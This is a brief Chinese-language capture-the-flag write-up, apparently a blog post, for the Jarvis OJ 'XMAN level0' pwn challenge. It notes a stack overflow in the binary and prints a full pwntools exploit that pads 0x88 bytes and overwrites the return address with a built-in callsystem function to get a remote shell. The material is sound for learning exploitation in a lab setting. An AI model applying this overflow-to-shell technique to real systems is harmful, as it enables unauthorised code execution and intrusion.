XMAN level0

2019-05-15

XMAN level0

2019-05-15

题目信息

nc pwn2.jarvisoj.com 9881

level0.b9ded3801d6dd36a97468e128b81a65d

只开了NX

静态分析

IDA F5，明显的溢出

在import中发现system，text中vuln上面发现内置的callsystem

那就很简单了，修改返回地址为callsystm直接getshell

exploit

offset = 136 = 0x80 + 8

构造exp

from pwn import *

elf = ELF('./level0')

sh = remote('pwn2.jarvisoj.com', 9881)
# sh = process('./level0')
context.arch = 'amd64'
context.log_level = 'debug'

callsystem = elf.symbols["callsystem"]

payload = 'A' * 0x88
payload += p64(callsystem)

sh.sendline(payload)
sh.interactive()

getflag

Last updated: 2019-05-15 10:15:25
水平不济整日被虐这也不会那也得学,脑子太蠢天天垫底这看不懂那学不会

暗羽